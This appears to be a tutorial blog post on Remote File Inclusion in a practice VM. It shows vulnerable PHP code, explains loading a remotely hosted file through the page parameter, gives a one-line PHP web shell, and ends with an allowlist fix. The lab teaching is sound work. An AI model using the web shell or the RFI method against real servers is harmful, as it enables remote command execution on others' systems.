Remote File Inclusion (RFI) is a vulnerability that occurs in web applications.

We use a Linux distribution called "Web for pen testers". You can download it from here. Now boot the virtual machine. You'll see a screen like this.

Yes, it is a Debian-based OS with a lot of examples that demonstrate common vulnerabilities such as command injection, SQL injection, cross-site scripting, etc. Apache and MySQL are pre-installed on this machine.

Now use your web browser to browse to the IP that we discovered in the last step. You can see the following web interface. Wow, there are many vulnerabilities to explore. There is more to practice with this VM.

In this tutorial we are going to focus on remote file inclusion. So let's select example1 of the File Include category.

In the URL you can see a parameter like the following.

example1.php?page=intro.php

Now think about what it does. When example1.php is loaded, intro.php is automatically included and whatever is in that file is executed. Now let's see what actually happens under the hood.

Here you can see the source code of example1.php

<?php require_once '../header.php'; ?>

<?php
        // The "page" request parameter goes straight into include() with no validation.
        if ($_GET["page"]) {
                include($_GET["page"]);
        }
?>

<?php require_once '../footer.php'; ?>

There is something to notice. Did you see the two statements called include and require_once? Both of them are used to insert another PHP script into the current file.

require raises a fatal error when the given file does not exist, so the current script stops executing.

include gives only a warning, and the rest of the script continues.

Now in the above example1.php they have used include($_GET["page"]); .

In several places I have explained $_GET[]. Do you remember what it does? It fetches the URL parameter called page and passes it to the include function.

Now what if we can include a PHP web shell using this method? What we have to do is upload the shell to a server and input the shell's URL as the page parameter. I hope you got a clear idea of RFI. Let's see how we can do this practically.

In the above screenshot I logged into the VM and looked for files. Actually, this step is not needed. Let's create a dummy PHP file for testing purposes.

Now I host that file on another VM and give the dummy file's URL as the input. Let's see what happens.

Wow, it is working.

Now let's build the actual PHP shell. In a previous tutorial I explained how to build a quick web shell.

<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>' ; ?>

Here you can see the final result.
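
The fix for the include in example1.php, as an added example that is not part of the original tutorial or the VM's code: the page parameter is checked against a fixed allowlist before it reaches include. The allowlist contents, the function name resolve_page and the sample inputs are assumptions for illustration.

```php
<?php
// Added example (not from the VM): allowlisted replacement for
// include($_GET["page"]). Names and sample values are assumptions.

// Only these files may ever be included; extend as the site grows.
const ALLOWED_PAGES = ['intro.php'];

// Return the absolute path of an allowed page, or null to reject.
function resolve_page($requested, string $baseDir): ?string
{
    // Rejects arrays (?page[]=x), URLs, traversal strings: anything
    // that is not exactly one of the allowlisted names.
    if (!is_string($requested) || !in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // realpath() returns false when the file is missing.
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    return $path === false ? null : $path;
}

if (PHP_SAPI === 'cli') {
    // Constructed demo: a temp directory holding one allowed page.
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . DIRECTORY_SEPARATOR . 'intro.php', 'intro');
    $samples = ['intro.php', 'http://192.0.2.10/dummy.php',
                '../../etc/passwd', ['intro.php']];
    foreach ($samples as $s) {
        $label = is_array($s) ? '(array)' : $s;
        printf("%-30s %s\n", $label, resolve_page($s, $dir) ?? 'REJECTED');
    }
    unlink($dir . DIRECTORY_SEPARATOR . 'intro.php');
    rmdir($dir);
} else {
    // Web request: same URL shape as example1.php?page=intro.php
    $file = resolve_page($_GET['page'] ?? 'intro.php', __DIR__);
    if ($file === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $file;
}
```

Setting allow_url_include to Off in php.ini (its default) stops include from fetching http:// URLs, but without the allowlist the same parameter can still pull in local files.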

 

I hope you enjoyed the tutorial. Leave a comment if you need any tutorials on these topics. I'll try my best to write a post. :-)